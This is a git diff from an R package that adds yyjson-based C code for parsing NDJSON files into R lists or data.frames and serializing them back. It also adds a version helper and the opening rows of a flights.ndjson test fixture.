//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + SEXP list_ = PROTECT(allocVector(VECSXP, 64)); + R_xlen_t list_size = XLENGTH(list_); + + + //~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + // Iterate over the file. For each line + // - check if new data would overflow list + // - if so, then grow list + // - create a yyjson doc from this line + // - if document is NULL + // insert a NULL into list + // - otherwise + // insert resulting robject into list + // - free the doc + //~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + unsigned int i = 0; + while (gzgets(input, buf, MAX_LINE_LENGTH) != 0) { + + if (i >= nread) { + break; + } + + //~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + // Grow list if we need more room + //~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + if (i >= list_size) { + UNPROTECT(1); + list_ = PROTECT(grow_list(list_)); + list_size = XLENGTH(list_); + } + + // ignore lines which are just a "\n". + // might have to do something fancier for lines with just whitespace + if (strlen(buf) <= 1) continue; + + yyjson_read_err err; + yyjson_doc *doc = yyjson_read_opts(buf, strlen(buf), opt.yyjson_read_flag, NULL, &err); + + if (doc == NULL) { + output_verbose_error(buf, err); + warning("Couldn't parse NDJSON row %i. Inserting 'NULL'\n", i + 1); + SET_VECTOR_ELT(list_, i, R_NilValue); + } else { + SET_VECTOR_ELT(list_, i, parse_json_from_str(buf, strlen(buf), &opt)); + } + + yyjson_doc_free(doc); + + i++; + } + + //~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + // In-situ faux truncation of a VECSXP object. + // This just hides the trailing elements from R + //~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + SETLENGTH(list_, i); + SET_TRUELENGTH(list_, list_size); + SET_GROWABLE_BIT(list_); + + //~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + // Close input, tidy memory and return + //~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + gzclose(input); + UNPROTECT(1); + return list_; +} + + + + +//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +// Parse ndjson as a data.frame one-rorw-per-line-of-input +// +// Compared to parsing to list +// CON: Complex multi-column handling +// CON: in order to avoid re-allocation of memory as file is read, we have to +// do an initial pass over the file to count the lines so we know the +// number of rows. +// CON: Have to probe the data.set to find out data types for each column. +// This is done once at the start of the parse, and it is then +// assumed all future types match the types seen so far. +// This might not be true, but a comprimise I'm making for speed. +// PRO: Faster. Data.frame allocation happens once, and data is slotted into +// it. No re-allocation as we pre-determine the number of rows and +// type for each columnx +//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +SEXP parse_ndjson_file_as_df_(SEXP filename_, SEXP nread_, SEXP nskip_, SEXP nprobe_, SEXP parse_opts_) { + + int nprotect = 0; + char buf[MAX_LINE_LENGTH]; + parse_options opt = create_parse_options(parse_opts_); + const char *filename = (const char *)CHAR(STRING_ELT(filename_, 0)); + filename = R_ExpandFileName(filename); + + //~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + // Check for file + //~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + if (access(filename, R_OK) != 0) { + error("Cannot read from file '%s'", filename); + } + + + int nread = asInteger(nread_); + int nskip = asInteger(nskip_); + int nprobe = asInteger(nprobe_); + + if (nread < 0) { + nread = INT32_MAX; + } + + if (nprobe < 0) { + nprobe = INT32_MAX; + } + + //~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + // Get the maximum possible number of json rows in this ndjson file. + // Note: the actual number of rows to parse may be less than this due + // to blank lines and/or errors. + // 'nrows' controls the amount of memory pre-allocated for rows in the df. + //~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + int nrows = count_lines(filename); + + // Account for rows to be skipped + nrows = nrows - nskip; + if (nrows < 0) { + nrows = 0; + } + + // Ensure we don't read more than the user requested + if (nrows > nread) { + nrows = nread; + } + + //~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + // Accumulation of unique key-names in the objects + // These will become the column names of the data.frame. + // Each column also has a 'type_bitset' to keep track of the type of each + // value across the different {}-objects + //~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + char *colname[MAX_DF_COLS]; + unsigned int type_bitset[MAX_DF_COLS] = {0}; + unsigned int sexp_type[MAX_DF_COLS] = {0}; + int ncols = 0; + + + //~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + // Probe file for types + //~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + gzFile input = gzopen(filename, "r"); + + //~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + // Skip lines if requested + //~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + if (nskip > 0) { + int nskip2 = nskip; + while (gzgets(input, buf, MAX_LINE_LENGTH) != 0) { + nskip2--; + if (nskip2 == 0) break; + } + } + + for (unsigned int i = 0; i < nprobe; i++) { + char *ret = gzgets(input, buf, MAX_LINE_LENGTH); + if (ret == NULL) { + break; + } + + + // ignore lines which are just a "\n". + // might have to do something fancier for lines with just whitespace + if (strlen(buf) <= 1) continue; + + yyjson_read_err err; + yyjson_doc *doc = yyjson_read_opts(buf, strlen(buf), opt.yyjson_read_flag, NULL, &err); + if (doc == NULL) { + output_verbose_error(buf, err); + error("Couldn't parse JSON during probe line %i\n", i + 1); + } + + yyjson_val *obj = yyjson_doc_get_root(doc); + yyjson_val *key; + yyjson_obj_iter obj_iter = yyjson_obj_iter_with(obj); // MUST be an object + + while ((key = yyjson_obj_iter_next(&obj_iter))) { + yyjson_val *val = yyjson_obj_iter_get_val(key); + + int name_idx = -1; + for (int i = 0; i < ncols; i++) { + if (yyjson_equals_str(key, colname[i])) { + name_idx = i; + break; + } + } + if (name_idx < 0) { + // Name has not been seen yet + name_idx = ncols; + colname[ncols] = (char *)yyjson_get_str(key); + ncols++; + if (ncols == MAX_DF_COLS) { + error("Maximum columns for data.frame exceeded: %i", MAX_DF_COLS); + } + } + + type_bitset[name_idx] = update_type_bitset(type_bitset[name_idx], val, &opt); + } + + } + + gzclose(input); + + //~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + // Create a data.frame. + //~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + SEXP df_ = PROTECT(allocVector(VECSXP, ncols)); nprotect++; + + + + //~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + // For each column name, + // - determine the best SEXP to represent the 'type_bitset' + // - Call a parse function which will + // - loop through the entire []-array, plucking the value from each + // {}-object + // - return an atomic vector or a list + // - place this vector as a column in the data.frame + //~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + for (unsigned int col = 0; col < ncols; col++) { + sexp_type[col] = get_best_sexp_to_represent_type_bitset(type_bitset[col], &opt); + + // INT64SXP is actually contained in a REALSXP + unsigned int alloc_type = sexp_type[col] == INT64SXP ? REALSXP : sexp_type[col]; + + // Allocate memory for column + SEXP vec_ = PROTECT(allocVector(alloc_type, nrows)); + if (sexp_type[col] == INT64SXP) { + setAttrib(vec_, R_ClassSymbol, mkString("integer64")); + } + + // place vector into data.frame + SET_VECTOR_ELT(df_, col, vec_); + UNPROTECT(1); // no longer needs protection once part of data.frame + } + + + //~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + // Parse file + //~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + input = gzopen(filename, "r"); + + //~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + // Skip lines if requested + //~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + if (nskip > 0) { + while (gzgets(input, buf, MAX_LINE_LENGTH) != 0) { + nskip--; + if (nskip == 0) break; + } + } + + // keep track of actual number of rows parsed. + // This might not be the same as 'nrow' as we can skip rows that we + // can't parse. + int row = 0; + + for (unsigned int i = 0; i < nrows; i++) { + char *ret = gzgets(input, buf, MAX_LINE_LENGTH); + if (ret == NULL) { + error("Unexepcted end to data\n"); + } + + // ignore lines which are just a "\n". + // might have to do something fancier for lines with just whitespace + if (strlen(buf) <= 1) continue; + + yyjson_read_err err; + yyjson_doc *doc = yyjson_read_opts(buf, strlen(buf), opt.yyjson_read_flag, NULL, &err); + if (doc == NULL) { + output_verbose_error(buf, err); + error("Couldn't parse JSON on line %i\n", i + 1); + } + + yyjson_val *obj = yyjson_doc_get_root(doc); + if (yyjson_get_type(obj) != YYJSON_TYPE_OBJ) { + error("parse_ndjson_as_df() only works if all lines represent JSON objects"); + } + + for (unsigned int col = 0; col < ncols; col++) { + SEXP column_ = VECTOR_ELT(df_, col); + + yyjson_val *val = yyjson_obj_get(obj, colname[col]); + + switch(sexp_type[col]) { + case LGLSXP: + LOGICAL(column_)[row] = json_val_to_logical(val, &opt); + break; + case INTSXP: + INTEGER(column_)[row] = json_val_to_integer(val, &opt); + break; + case INT64SXP: { + long long tmp = json_val_to_integer64(val, &opt); + ((long long *)(REAL(column_)))[row] = tmp; + } + break; + case REALSXP: + REAL(column_)[row] = json_val_to_double(val, &opt); + break; + case STRSXP: + if (val == NULL) { + SET_STRING_ELT(column_, row, NA_STRING); + } else { + SET_STRING_ELT(column_, row, json_val_to_charsxp(val, &opt)); + } + break; + case VECSXP: + if (val == NULL) { + SET_VECTOR_ELT(column_, row, opt.df_missing_list_elem); + } else { + SET_VECTOR_ELT(column_, row, json_as_robj(val, &opt)); + } + break; + default: + error("parse_ndjson_file_as_df_(): Unknown type"); + } + + } + + row++; + } + + gzclose(input); + + + //~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + // Set colnames on data.frame + //~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + SEXP nms_ = PROTECT(allocVector(STRSXP, ncols)); nprotect++; + for (unsigned int i = 0; i < ncols; i++) { + SET_STRING_ELT(nms_, i, mkChar(colname[i])); + } + Rf_setAttrib(df_, R_NamesSymbol, nms_); + + //~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + // Resize each data.frame column vector to match the actual data length + //~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + if (nrows != row) { + int allocated_length = nrows; + int data_length = row; + for (int i=0; i < length(df_); i++) { + SETLENGTH(VECTOR_ELT(df_, i), data_length); + SET_TRUELENGTH(VECTOR_ELT(df_, i), allocated_length); + SET_GROWABLE_BIT(VECTOR_ELT(df_, i)); + } + } + + //~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + // Set empty rownames on data.frame + //~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + SEXP rownames = PROTECT(allocVector(INTSXP, 2)); nprotect++; + SET_INTEGER_ELT(rownames, 0, NA_INTEGER); + SET_INTEGER_ELT(rownames, 1, -row); + setAttrib(df_, R_RowNamesSymbol, rownames); + + //~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + // Set 'data.frame' class + //~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + SET_CLASS(df_, mkString("data.frame")); + + UNPROTECT(nprotect); + return df_; +} + diff --git a/src/ndjson-serialize.c b/src/ndjson-serialize.c new file mode 100644 index 0000000..7297b64 --- /dev/null +++ b/src/ndjson-serialize.c @@ -0,0 +1,350 @@ + + +#include +#include +#include +#include + +#include +#include +#include + +#include + +#include "yyjson.h" +#include "R-yyjson-serialize.h" + + +//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +// +//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +SEXP serialize_list_to_ndjson_file_(SEXP robj_, SEXP filename_, SEXP serialize_opts_) { + + serialize_options opt = parse_serialize_options(serialize_opts_); + + FILE *file = NULL; + R_xlen_t nelems = xlength(robj_); + + const char *filename = CHAR(STRING_ELT(filename_, 0)); + file = fopen(filename, "w"); + if (file == NULL) { + error("Couldn't open file: %s", filename); + } + + for (R_xlen_t idx = 0; idx < nelems; idx++) { + SEXP elem_ = VECTOR_ELT(robj_, idx); + + yyjson_mut_doc *doc = yyjson_mut_doc_new(NULL); + yyjson_mut_val *val = serialize_core(elem_, doc, &opt); + yyjson_mut_doc_set_root(doc, val); + + //~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + // Write to File Pointer + //~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + yyjson_write_err err; + bool res = yyjson_mut_write_fp(file, doc, opt.yyjson_write_flag, NULL, &err); + if (!res) { + error("Error writing to file at element %i\n", idx); + } + fputc('\n', file); + + yyjson_mut_doc_free(doc); + } + + + fclose(file); + return R_NilValue; +} + + +//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +// +//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +SEXP serialize_list_to_ndjson_str_(SEXP robj_, SEXP serialize_opts_) { + serialize_options opt = parse_serialize_options(serialize_opts_); + + char **ndjson = NULL; + R_xlen_t nelems = xlength(robj_); + + ndjson = (char **)calloc((unsigned long)nelems, sizeof(char *)); + + for (R_xlen_t idx = 0; idx < nelems; idx++) { + SEXP elem_ = VECTOR_ELT(robj_, idx); + + yyjson_mut_doc *doc = yyjson_mut_doc_new(NULL); + yyjson_mut_val *val = serialize_core(elem_, doc, &opt); + yyjson_mut_doc_set_root(doc, val); + ndjson[idx] = yyjson_mut_write(doc, opt.yyjson_write_flag, NULL); + yyjson_mut_doc_free(doc); + } + + + // concatenate into single string for return to R + unsigned int total_len = 1; // extra '1' for '\0' byte at end of string + for (unsigned int idx = 0; idx < nelems; idx++) { + total_len += strlen(ndjson[idx]) + 1; // extra 1 for `\n' for each row. + // Rprintf("Total length: %i\n", total_len); + } + char *total_str; + total_str = (char *)calloc(total_len, sizeof(char)); + + unsigned int pos = 0; + for (unsigned int idx = 0; idx < nelems; idx++) { + strcpy(total_str + pos, ndjson[idx]); + pos += strlen(ndjson[idx]); + total_str[pos] = '\n'; + pos++; + } + total_str[total_len - 2] = '\0'; + + SEXP ndjson_ = PROTECT(allocVector(STRSXP, 1)); + SET_STRING_ELT(ndjson_, 0, mkChar(total_str)); + free(ndjson); + UNPROTECT(1); + return ndjson_; +} + + + + + +//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +// Serialize list or data.frame to NDJSON +//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +SEXP serialize_df_to_ndjson_file_(SEXP robj_, SEXP filename_, SEXP serialize_opts_) { + + serialize_options opt = parse_serialize_options(serialize_opts_); + + if (!inherits(robj_, "data.frame")) { + error("serialize_ndjson_(): object must a list or data.frame"); + } + + // Get sexp_types of all columns + // Get number of rows + // for each row + // create document + // create {}-object + // for each col + // add value to object + // write string to file. + + R_xlen_t ncols = xlength(robj_); + R_xlen_t nrows = xlength(VECTOR_ELT(robj_, 0)); + SEXP nms_ = getAttrib(robj_, R_NamesSymbol); + + FILE *file = NULL; + const char *filename = CHAR(STRING_ELT(filename_, 0)); + file = fopen(filename, "w"); + if (file == NULL) { + error("Couldn't open file: %s", filename); + } + + for (unsigned int row = 0; row < nrows; row++) { + yyjson_mut_doc *doc = yyjson_mut_doc_new(NULL); + yyjson_mut_val *obj = yyjson_mut_obj(doc); + for (unsigned int col = 0; col < ncols; col++) { + const char *key_str = CHAR(STRING_ELT(nms_, col)); + yyjson_mut_val *key = yyjson_mut_str(doc, key_str); + yyjson_mut_val *val; + SEXP col_ = VECTOR_ELT(robj_, col); + + switch(TYPEOF(col_)) { + case LGLSXP: + val = scalar_logical_to_json_val(INTEGER(col_)[row], doc, &opt); + break; + case INTSXP: + if (isFactor(col_)) { + val = scalar_factor_to_json_val(col_, row, doc, &opt); + } else if (inherits(col_, "Date")) { + val = scalar_date_to_json_val(col_, row, doc, &opt); + } else if (inherits(col_, "POSIXct")) { + val = scalar_posixct_to_json_val(col_, row, doc, &opt); + } else { + val = scalar_integer_to_json_val(INTEGER(col_)[row], doc, &opt); + } + break; + case REALSXP: { + if (inherits(col_, "Date")) { + val = scalar_date_to_json_val(col_, row, doc, &opt); + } else if (inherits(col_, "POSIXct")) { + val = scalar_posixct_to_json_val(col_, row, doc, &opt); + } else if (inherits(col_, "integer64")) { + val = scalar_integer64_to_json_val(col_, row, doc, &opt); + } else { + val = scalar_double_to_json_val(REAL(col_)[row], doc, &opt); + } + } + break; + case STRSXP: { + val = scalar_strsxp_to_json_val(col_, row, doc, &opt); + } + break; + case VECSXP: + val = serialize_core(VECTOR_ELT(col_, row), doc, &opt); + break; + case RAWSXP: + val = scalar_rawsxp_to_json_val(col_, row, doc, &opt); + break; + default: + error("data_frame_to_json_array_of_objects(): Unhandled scalar SEXP: %s\n", type2char((SEXPTYPE)TYPEOF(col_))); + } + // Add value to row obj + if (val != NULL) { + yyjson_mut_obj_add(obj, key, val); + } + } + yyjson_mut_doc_set_root(doc, obj); + + //~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + // Write to JSON string + //~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + yyjson_write_err err; + bool res = yyjson_mut_write_fp(file, doc, opt.yyjson_write_flag, NULL, &err); + if (!res) { + error("Error writing to file at row %i\n", row); + } + fputc('\n', file); + + //~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + // tidy and return + //~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + yyjson_mut_doc_free(doc); + + } + + fclose(file); + + return R_NilValue; +} + + + + + +//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +// Serialize list or data.frame to NDJSON +//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +SEXP serialize_df_to_ndjson_str_(SEXP robj_, SEXP serialize_opts_) { + + serialize_options opt = parse_serialize_options(serialize_opts_); + + if (!inherits(robj_, "data.frame")) { + error("serialize_ndjson_(): object must a list or data.frame"); + } + + // Get sexp_types of all columns + // Get number of rows + // for each row + // create document + // create {}-object + // for each col + // add value to object + // write string to file. + + R_xlen_t ncols = xlength(robj_); + R_xlen_t nrows = xlength(VECTOR_ELT(robj_, 0)); + SEXP nms_ = getAttrib(robj_, R_NamesSymbol); + + char **ndjson = NULL; + ndjson = (char **)calloc((unsigned long)nrows, sizeof(char *)); + + for (R_xlen_t row = 0; row < nrows; row++) { + yyjson_mut_doc *doc = yyjson_mut_doc_new(NULL); + yyjson_mut_val *obj = yyjson_mut_obj(doc); + for (R_xlen_t col = 0; col < ncols; col++) { + const char *key_str = CHAR(STRING_ELT(nms_, col)); + yyjson_mut_val *key = yyjson_mut_str(doc, key_str); + yyjson_mut_val *val; + SEXP col_ = VECTOR_ELT(robj_, col); + + switch(TYPEOF(col_)) { + case LGLSXP: + val = scalar_logical_to_json_val(INTEGER(col_)[row], doc, &opt); + break; + case INTSXP: + if (isFactor(col_)) { + val = scalar_factor_to_json_val(col_, row, doc, &opt); + } else if (inherits(col_, "Date")) { + val = scalar_date_to_json_val(col_, row, doc, &opt); + } else if (inherits(col_, "POSIXct")) { + val = scalar_posixct_to_json_val(col_, row, doc, &opt); + } else { + val = scalar_integer_to_json_val(INTEGER(col_)[row], doc, &opt); + } + break; + case REALSXP: { + if (inherits(col_, "Date")) { + val = scalar_date_to_json_val(col_, row, doc, &opt); + } else if (inherits(col_, "POSIXct")) { + val = scalar_posixct_to_json_val(col_, row, doc, &opt); + } else if (inherits(col_, "integer64")) { + val = scalar_integer64_to_json_val(col_, row, doc, &opt); + } else { + val = scalar_double_to_json_val(REAL(col_)[row], doc, &opt); + } + } + break; + case STRSXP: { + val = scalar_strsxp_to_json_val(col_, row, doc, &opt); + } + break; + case VECSXP: + val = serialize_core(VECTOR_ELT(col_, row), doc, &opt); + break; + case RAWSXP: + val = scalar_rawsxp_to_json_val(col_, row, doc, &opt); + break; + default: + error("data_frame_to_json_array_of_objects(): Unhandled scalar SEXP: %s\n", type2char((SEXPTYPE)TYPEOF(col_))); + } + // Add value to row obj + if (val != NULL) { + yyjson_mut_obj_add(obj, key, val); + } + } + yyjson_mut_doc_set_root(doc, obj); + + //~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + // Write to JSON string + //~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + ndjson[row] = yyjson_mut_write(doc, opt.yyjson_write_flag, NULL); + + //~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + // tidy and return + //~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + yyjson_mut_doc_free(doc); + + } + + // concatenate into single string for return to R + unsigned int total_len = 1; // extra '1' for '\0' byte at end of string + for (unsigned int row = 0; row < nrows; row++) { + total_len += strlen(ndjson[row]) + 1; // extra 1 for `\n' for each row. + // Rprintf("Total length: %i\n", total_len); + } + char *total_str; + total_str = (char *)calloc(total_len, sizeof(char)); + + unsigned int idx = 0; + for (unsigned int row = 0; row < nrows; row++) { + strcpy(total_str + idx, ndjson[row]); + idx += strlen(ndjson[row]); + if (row == nrows - 1) { + total_str[idx] = '\0'; + } else { + total_str[idx] = '\n'; + idx++; + } + } + + SEXP ndjson_ = PROTECT(allocVector(STRSXP, 1)); + SET_STRING_ELT(ndjson_, 0, mkChar(total_str)); + free(ndjson); + UNPROTECT(1); + return ndjson_; +} + + + + + diff --git a/src/utils.c b/src/utils.c new file mode 100644 index 0000000..c8606de --- /dev/null +++ b/src/utils.c @@ -0,0 +1,23 @@ + + + +#include +#include +#include + +#include +#include +#include +#include + +#include "yyjson.h" +#include "R-yyjson-serialize.h" + + + +//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +// inner yyjson version +//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +SEXP yyjson_version_(void) { + return mkString(YYJSON_VERSION_STRING); +} \ No newline at end of file diff --git a/tests/testthat/examples/flights.ndjson b/tests/testthat/examples/flights.ndjson new file mode 100644 index 0000000..a5e79c3 --- /dev/null +++ b/tests/testthat/examples/flights.ndjson @@ -0,0 +1,1000 @@ +{"year":2013,"month":1,"day":1,"dep_time":517,"sched_dep_time":515,"dep_delay":2,"arr_time":830,"sched_arr_time":819,"arr_delay":11,"carrier":"UA","flight":1545,"tailnum":"N14228","origin":"EWR","dest":"IAH","air_time":227,"distance":1400,"hour":5,"minute":15,"time_hour":"2013-01-01 05:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":533,"sched_dep_time":529,"dep_delay":4,"arr_time":850,"sched_arr_time":830,"arr_delay":20,"carrier":"UA","flight":1714,"tailnum":"N24211","origin":"LGA","dest":"IAH","air_time":227,"distance":1416,"hour":5,"minute":29,"time_hour":"2013-01-01 05:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":542,"sched_dep_time":540,"dep_delay":2,"arr_time":923,"sched_arr_time":850,"arr_delay":33,"carrier":"AA","flight":1141,"tailnum":"N619AA","origin":"JFK","dest":"MIA","air_time":160,"distance":1089,"hour":5,"minute":40,"time_hour":"2013-01-01 05:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":544,"sched_dep_time":545,"dep_delay":-1,"arr_time":1004,"sched_arr_time":1022,"arr_delay":-18,"carrier":"B6","flight":725,"tailnum":"N804JB","origin":"JFK","dest":"BQN","air_time":183,"distance":1576,"hour":5,"minute":45,"time_hour":"2013-01-01 05:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":554,"sched_dep_time":600,"dep_delay":-6,"arr_time":812,"sched_arr_time":837,"arr_delay":-25,"carrier":"DL","flight":461,"tailnum":"N668DN","origin":"LGA","dest":"ATL","air_time":116,"distance":762,"hour":6,"minute":0,"time_hour":"2013-01-01 06:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":554,"sched_dep_time":558,"dep_delay":-4,"arr_time":740,"sched_arr_time":728,"arr_delay":12,"carrier":"UA","flight":1696,"tailnum":"N39463","origin":"EWR","dest":"ORD","air_time":150,"distance":719,"hour":5,"minute":58,"time_hour":"2013-01-01 05:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":555,"sched_dep_time":600,"dep_delay":-5,"arr_time":913,"sched_arr_time":854,"arr_delay":19,"carrier":"B6","flight":507,"tailnum":"N516JB","origin":"EWR","dest":"FLL","air_time":158,"distance":1065,"hour":6,"minute":0,"time_hour":"2013-01-01 06:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":557,"sched_dep_time":600,"dep_delay":-3,"arr_time":709,"sched_arr_time":723,"arr_delay":-14,"carrier":"EV","flight":5708,"tailnum":"N829AS","origin":"LGA","dest":"IAD","air_time":53,"distance":229,"hour":6,"minute":0,"time_hour":"2013-01-01 06:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":557,"sched_dep_time":600,"dep_delay":-3,"arr_time":838,"sched_arr_time":846,"arr_delay":-8,"carrier":"B6","flight":79,"tailnum":"N593JB","origin":"JFK","dest":"MCO","air_time":140,"distance":944,"hour":6,"minute":0,"time_hour":"2013-01-01 06:00:00"} 